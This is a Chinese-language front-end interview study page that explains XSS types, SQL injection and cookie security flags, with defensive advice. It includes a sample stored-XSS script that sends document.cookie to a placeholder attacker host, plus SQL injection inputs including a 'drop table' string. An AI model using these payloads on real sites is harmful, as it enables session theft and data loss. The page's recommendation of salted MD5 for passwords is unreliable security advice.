<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>一、xss攻击 | 前端文档</title>
    <meta name="generator" content="VuePress 1.9.7">
    
    <meta name="description" content="">
    <meta name="theme-color" content="#3eaf7c">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    
    <link rel="preload" href="/assets/css/0.styles.c16151cb.css" as="style"><link rel="preload" href="/assets/js/app.58f04004.js" as="script"><link rel="preload" href="/assets/js/2.72d74e75.js" as="script"><link rel="preload" href="/assets/js/67.07a01b3f.js" as="script"><link rel="prefetch" href="/assets/js/10.b84a7c64.js"><link rel="prefetch" href="/assets/js/100.008efd72.js"><link rel="prefetch" href="/assets/js/101.3714e142.js"><link rel="prefetch" href="/assets/js/102.cfec82a4.js"><link rel="prefetch" href="/assets/js/103.74ca512c.js"><link rel="prefetch" href="/assets/js/104.3a336072.js"><link rel="prefetch" href="/assets/js/11.fe0e74db.js"><link rel="prefetch" href="/assets/js/12.de48ca6f.js"><link rel="prefetch" href="/assets/js/13.da6877eb.js"><link rel="prefetch" href="/assets/js/14.528ae643.js"><link rel="prefetch" href="/assets/js/15.c0d4cae2.js"><link rel="prefetch" href="/assets/js/16.b71d2e49.js"><link rel="prefetch" href="/assets/js/17.67be6bac.js"><link rel="prefetch" href="/assets/js/18.13984d56.js"><link rel="prefetch" href="/assets/js/19.ebca0ab9.js"><link rel="prefetch" href="/assets/js/20.b6a5314d.js"><link rel="prefetch" href="/assets/js/21.bb10d8b2.js"><link rel="prefetch" href="/assets/js/22.f10df079.js"><link rel="prefetch" href="/assets/js/23.a822680d.js"><link rel="prefetch" href="/assets/js/24.360e6d19.js"><link rel="prefetch" href="/assets/js/25.1a4e256e.js"><link rel="prefetch" href="/assets/js/26.b28381cc.js"><link rel="prefetch" href="/assets/js/27.f7cce0ef.js"><link rel="prefetch" href="/assets/js/28.823d3358.js"><link rel="prefetch" href="/assets/js/29.54e6a189.js"><link rel="prefetch" href="/assets/js/3.84922cf3.js"><link rel="prefetch" href="/assets/js/30.01d92de2.js"><link rel="prefetch" href="/assets/js/31.2ceeee02.js"><link rel="prefetch" href="/assets/js/32.1193fd5d.js"><link rel="prefetch" href="/assets/js/33.13214ed0.js"><link rel="prefetch" href="/assets/js/34.0bc17c61.js"><link rel="prefetch" href="/assets/js/35.5f368a36.js"><link rel="prefetch" href="/assets/js/36.045dbaf9.js"><link rel="prefetch" href="/assets/js/37.15362138.js"><link rel="prefetch" href="/assets/js/38.69d1ded3.js"><link rel="prefetch" href="/assets/js/39.e9284172.js"><link rel="prefetch" href="/assets/js/4.cde39425.js"><link rel="prefetch" href="/assets/js/40.651682e8.js"><link rel="prefetch" href="/assets/js/41.aebdf2fa.js"><link rel="prefetch" href="/assets/js/42.bc98c52a.js"><link rel="prefetch" href="/assets/js/43.e2f77f84.js"><link rel="prefetch" href="/assets/js/44.ce5973cd.js"><link rel="prefetch" href="/assets/js/45.6d4d1019.js"><link rel="prefetch" href="/assets/js/46.1ecb0155.js"><link rel="prefetch" href="/assets/js/47.a91df53e.js"><link rel="prefetch" href="/assets/js/48.a8892445.js"><link rel="prefetch" href="/assets/js/49.fd13a267.js"><link rel="prefetch" href="/assets/js/5.3988f2a7.js"><link rel="prefetch" href="/assets/js/50.8f4c953a.js"><link rel="prefetch" href="/assets/js/51.c63c7d06.js"><link rel="prefetch" href="/assets/js/52.8cacdf11.js"><link rel="prefetch" href="/assets/js/53.d0a4aedb.js"><link rel="prefetch" href="/assets/js/54.89ecf6b4.js"><link rel="prefetch" href="/assets/js/55.75f9af84.js"><link rel="prefetch" href="/assets/js/56.7811d98a.js"><link rel="prefetch" href="/assets/js/57.31eceea4.js"><link rel="prefetch" href="/assets/js/58.dc4a7ed8.js"><link rel="prefetch" href="/assets/js/59.e8e373e7.js"><link rel="prefetch" href="/assets/js/6.3028bb71.js"><link rel="prefetch" href="/assets/js/60.205b17bd.js"><link rel="prefetch" href="/assets/js/61.f68e6746.js"><link rel="prefetch" href="/assets/js/62.32df277b.js"><link rel="prefetch" href="/assets/js/63.d5936a75.js"><link rel="prefetch" href="/assets/js/64.0cd9401d.js"><link rel="prefetch" href="/assets/js/65.cda5980a.js"><link rel="prefetch" href="/assets/js/66.fd45dcc5.js"><link rel="prefetch" href="/assets/js/68.d39a7bef.js"><link rel="prefetch" href="/assets/js/69.53c7de37.js"><link rel="prefetch" href="/assets/js/7.57913225.js"><link rel="prefetch" href="/assets/js/70.7e276bbb.js"><link rel="prefetch" href="/assets/js/71.d72f9f89.js"><link rel="prefetch" href="/assets/js/72.8c50b16a.js"><link rel="prefetch" href="/assets/js/73.50b6233a.js"><link rel="prefetch" href="/assets/js/74.478dab79.js"><link rel="prefetch" href="/assets/js/75.2aeddba9.js"><link rel="prefetch" href="/assets/js/76.3e36b75d.js"><link rel="prefetch" href="/assets/js/77.851e36c1.js"><link rel="prefetch" href="/assets/js/78.0ffcde61.js"><link rel="prefetch" href="/assets/js/79.2c79c02e.js"><link rel="prefetch" href="/assets/js/8.1faf059c.js"><link rel="prefetch" href="/assets/js/80.197d0d92.js"><link rel="prefetch" href="/assets/js/81.e7f9cb50.js"><link rel="prefetch" href="/assets/js/82.51cd9ae2.js"><link rel="prefetch" href="/assets/js/83.f4725e16.js"><link rel="prefetch" href="/assets/js/84.15cacdf2.js"><link rel="prefetch" href="/assets/js/85.ae126ee1.js"><link rel="prefetch" href="/assets/js/86.6d1c4bac.js"><link rel="prefetch" href="/assets/js/87.236d21a3.js"><link rel="prefetch" href="/assets/js/88.cd862051.js"><link rel="prefetch" href="/assets/js/89.09b1a8d7.js"><link rel="prefetch" href="/assets/js/9.b58cbdb9.js"><link rel="prefetch" href="/assets/js/90.3c50d1f8.js"><link rel="prefetch" href="/assets/js/91.d3d51315.js"><link rel="prefetch" href="/assets/js/92.5eb05255.js"><link rel="prefetch" href="/assets/js/93.15b79eec.js"><link rel="prefetch" href="/assets/js/94.485c4437.js"><link rel="prefetch" href="/assets/js/95.2b21d45e.js"><link rel="prefetch" href="/assets/js/96.3be6aa08.js"><link rel="prefetch" href="/assets/js/97.b1bb574e.js"><link rel="prefetch" href="/assets/js/98.5b40f5e2.js"><link rel="prefetch" href="/assets/js/99.4d1043a6.js">
    <link rel="stylesheet" href="/assets/css/0.styles.c16151cb.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">前端文档</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="front end" class="dropdown-title"><span class="title">前端</span> <span class="arrow down"></span></button> <button type="button" aria-label="front end" class="mobile-dropdown-title"><span class="title">前端</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/frontend/html/" class="nav-link">
  html
</a></li><li class="dropdown-item"><!----> <a href="/frontend/css/" class="nav-link">
  css
</a></li><li class="dropdown-item"><!----> <a href="/frontend/js/" class="nav-link">
  js
</a></li></ul></div></div><div class="nav-item"><a href="/interview/" class="nav-link router-link-active">
  面试题
</a></div><div class="nav-item"><a href="/linux/" class="nav-link">
  linux
</a></div><div class="nav-item"><a href="https://github.com/305810827" target="_blank" rel="noopener noreferrer" class="nav-link external">
  github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="front end" class="dropdown-title"><span class="title">前端</span> <span class="arrow down"></span></button> <button type="button" aria-label="front end" class="mobile-dropdown-title"><span class="title">前端</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/frontend/html/" class="nav-link">
  html
</a></li><li class="dropdown-item"><!----> <a href="/frontend/css/" class="nav-link">
  css
</a></li><li class="dropdown-item"><!----> <a href="/frontend/js/" class="nav-link">
  js
</a></li></ul></div></div><div class="nav-item"><a href="/interview/" class="nav-link router-link-active">
  面试题
</a></div><div class="nav-item"><a href="/linux/" class="nav-link">
  linux
</a></div><div class="nav-item"><a href="https://github.com/305810827" target="_blank" rel="noopener noreferrer" class="nav-link external">
  github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>javascript</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>css</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>vue</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>netword</span> <span class="arrow down"></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/interview/netword/页面是怎么来的.html" class="sidebar-link">页面是怎么来的</a></li><li><a href="/interview/netword/跨域问题.html" class="sidebar-link">跨域问题</a></li><li><a href="/interview/netword/跨域请求如何携带cookie.html" class="sidebar-link">跨域请求如何携带cookie</a></li><li><a href="/interview/netword/http缓存.html" class="sidebar-link">http缓存</a></li><li><a href="/interview/netword/https.html" class="sidebar-link">https</a></li><li><a href="/interview/netword/http1.0、http1.1、http2.0.html" class="sidebar-link">http1.0、http1.1、http2.0</a></li><li><a href="/interview/netword/http request process.html" class="sidebar-link">http request process</a></li><li><a href="/interview/netword/TCP、UDP.html" class="sidebar-link">TCP、UDP</a></li><li><a href="/interview/netword/HttpOnly.html" class="sidebar-link">HttpOnly</a></li><li><a href="/interview/netword/Cross-Site-Scripting攻击.html" class="active sidebar-link">Cross-Site-Scripting攻击</a><ul class="sidebar-sub-headers"></ul></li><li><a href="/interview/netword/Cross-Site-Request-Forgery.html" class="sidebar-link">Cross-Site-Request-Forgery</a></li><li><a href="/interview/netword/Content-Security-Policy.html" class="sidebar-link">Content-Security-Policy</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Algorithms</span> <span class="arrow right"></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>other</span> <span class="arrow right"></span></p> <!----></section></li></ul> </aside> <main class="page"> <div class="theme-default-content content__default"><h3 id="一、xss攻击"><a href="#一、xss攻击" class="header-anchor">#</a> 一、xss攻击</h3> <p>**XSS 即（Cross Site Scripting）中文名称为：跨站脚本攻击。**XSS的重点不在于跨站点，而在于脚本的执行。那么XSS的原理是：
恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候，那么嵌入到web页面中script代码会执行，因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类：反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。</p> <p><strong>反射型XSS</strong></p> <p>反射性XSS又可以叫做非持久性XSS，在恶意链接上添加恶意脚本代码，当受害者点击恶意链接url的时候，恶意代码会直接在受害者的主机上的浏览器执行。</p> <p>因此反射型XSS的攻击步骤如下：</p> <p>1、攻击者在url后面的参数中加入恶意攻击代码。
2、当用户打开带有恶意代码的URL的时候，网站服务端将恶意代码从URL中取出，拼接在html中并且返回给浏览器端。
3、 用户浏览器接收到响应后执行解析，其中的恶意代码也会被执行到。
4、攻击者通过恶意代码来窃取到用户数据并发送到攻击者的网站。攻击者会获取到比如cookie等信息，然后使用该信息来冒充合法用户
的行为，调用目标网站接口执行攻击等操作。</p> <p><strong>存储型XSS</strong></p> <p><strong>存储型XSS的原理是：主要是将恶意代码上传或存储到服务器中，下次只要受害者浏览包含此恶意代码的页面就会执行恶意代码。</strong></p> <p>比如我现在做了一个博客网站，然后攻击者在上面发布了一篇文章，内容是如下：<script>window.open(&amp;quot;www.gongji.com?param=&amp;quot;+document.cookie)</script> 如果我没有对该文章进行任何处理的话，直接存入到数据库中，那么下一次当其他用户访问该文章的时候，服务器会从数据库中读取后然后响应给客户端，那么浏览器就会执行这段脚本，然后攻击者就会获取到用户的cookie，然后会把cookie发送到攻击者的服务器上了。</p> <p><strong>因此存储型XSS的攻击步骤如下：</strong></p> <p>1、攻击者将恶意代码提交到目标网站数据库中。
2、用户打开目标网站时，网站服务器将恶意代码从数据库中取出，然后拼接到html中返回给浏览器中。
3、用户浏览器接收到响应后解析执行，那么其中的恶意代码也会被执行。
4、那么恶意代码执行后，就能获取到用户数据，比如上面的cookie等信息，那么把该cookie发送到攻击者网站中，那么攻击者拿到该cookie然后会冒充该用户的行为，调用目标网站接口等违法操作。</p> <p><strong>如何防范？</strong>
1、后端需要对提交的数据进行过滤。
2、前端也可以做一下处理方式，比如对script标签，将特殊字符替换成HTML编码这些等。</p> <h5 id="dom-based型xss"><a href="#dom-based型xss" class="header-anchor">#</a> DOM-based型XSS</h5> <p>我们客户端的js可以对页面dom节点进行动态的操作，比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话，但是这些脚本又没有做任何过滤处理的话，那么我们的应用程序就有可能受到DOM-based XSS的攻击。因此DOM型XSS的攻击步骤如下：</p> <p>1、攻击者构造出特殊的URL、在其中可能包含恶意代码。
2、用户打开带有恶意代码的URL。
3、用户浏览器收到响应后解析执行。前端使用js取出url中的恶意代码并执行。
4、执行时，恶意代码窃取用户数据并发送到攻击者的网站中，那么攻击者网站拿到这些数据去冒充用户的行为操作。调用目标网站接口执行攻击者一些操作。</p> <p><strong>DOM XSS 是基于文档对象模型的XSS。一般有如下DOM操作：</strong>
1、使用document.write直接输出数据。
2、使用innerHTML直接输出数据。
3、使用location、location.href、location.replace、iframe.src、document.referer、window.name等这些。
比如如下demo:</p> <div class="language- extra-class"><pre class="language-text"><code>&lt;script&gt;
  document.body.innerHTML = &quot;&lt;a href='&quot;+url+&quot;'&gt;&quot;+url+&quot;&lt;/a&gt;&quot;;
&lt;/script&gt;
</code></pre></div><h5 id="sql注入"><a href="#sql注入" class="header-anchor">#</a> SQL注入</h5> <p>SQL注入是通过客户端的输入把SQL命令注入到一个应用的数据库中，从而执行恶意的SQL语句。
什么意思呢？我们来打个比方：我们有一个登录框，需要输入用户名和密码对吧，然后我们的密码输入 'or '123' = '123 这样的。
我们在查询用户名和密码是否正确的时候，本来执行的sql语句是：select * from user where username = '' and password = ''. 这样的sql语句，现在我们输入密码是如上这样的，然后我们会通过参数进行拼接，拼接后的sql语句就是：
<strong>select * from user where username = '' and password = ' ' or '123' = '123 ';</strong> 这样的了，那么会有一个or语句，只要这两个有一个是正确的话，就条件成立，因此 123 = 123 是成立的。因此验证就会被跳过。这只是一个简单的列子，比如还有密码比如是这样的：'; drop table user;, 这样的话，那么sql命令就变成了：
<strong>select * from user where username = '' and password = ''; drop table user;'</strong> , 那么这个时候我们会把user表直接删除了。</p> <p>sql被攻击的原因是：sql语句伪造参数，然后对参数进行拼接后形成xss攻击的sql语句。最后会导致数据库被攻击了。</p> <p><strong>防范的方法：</strong>
1、我们可以使用预编译语句(PreparedStatement，这样的话即使我们使用sql语句伪造成参数，到了服务端的时候，这个伪造sql语句的参数也只是简单的字符，并不能起到攻击的作用。
2、数据库中密码不应明文存储的，可以对密码使用md5进行加密，为了加大破解成本，所以可以采用加盐的方式。</p> <h5 id="cookie安全策略"><a href="#cookie安全策略" class="header-anchor">#</a> cookie安全策略</h5> <p>在服务器端设置cookie的时候设置 http-only, 这样就可以防止用户通过JS获取cookie。对cookie的读写或发送一般有如下字段进行设置：</p> <p><strong>http-only:</strong> 只允许http或https请求读取cookie、JS代码是无法读取cookie的(document.cookie会显示http-only的cookie项被自动过滤掉)。发送请求时自动发送cookie.
<strong>secure-only:</strong> 只允许https请求读取，发送请求时自动发送cookie。
<strong>host-only:</strong> 只允许主机域名与domain设置完成一致的网站才能访问该cookie。</p> <p>https://www.cnblogs.com/tugenhua0707/p/10909284.html</p></div> <footer class="page-edit"><!----> <!----></footer> <div class="page-nav"><p class="inner"><span class="prev">
      ←
      <a href="/interview/netword/HttpOnly.html" class="prev">
        HttpOnly
      </a></span> <span class="next"><a href="/interview/netword/Cross-Site-Request-Forgery.html">
        Cross-Site-Request-Forgery
      </a>
      →
    </span></p></div> </main></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.58f04004.js" defer></script><script src="/assets/js/2.72d74e75.js" defer></script><script src="/assets/js/67.07a01b3f.js" defer></script>
  </body>
</html>
